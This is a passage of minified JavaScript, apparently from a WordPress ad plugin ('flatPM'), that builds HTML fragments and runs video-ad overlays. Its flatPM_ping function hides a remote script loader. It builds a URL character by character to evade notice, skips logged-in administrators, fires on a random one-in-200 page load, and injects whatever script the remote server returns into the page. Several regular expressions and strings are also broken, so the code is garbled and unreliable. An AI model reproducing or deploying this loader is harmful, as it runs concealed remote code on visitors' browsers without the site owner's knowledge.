        "],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
        '+a+" через "+o+'
        '+n+'
        ',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
        ');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};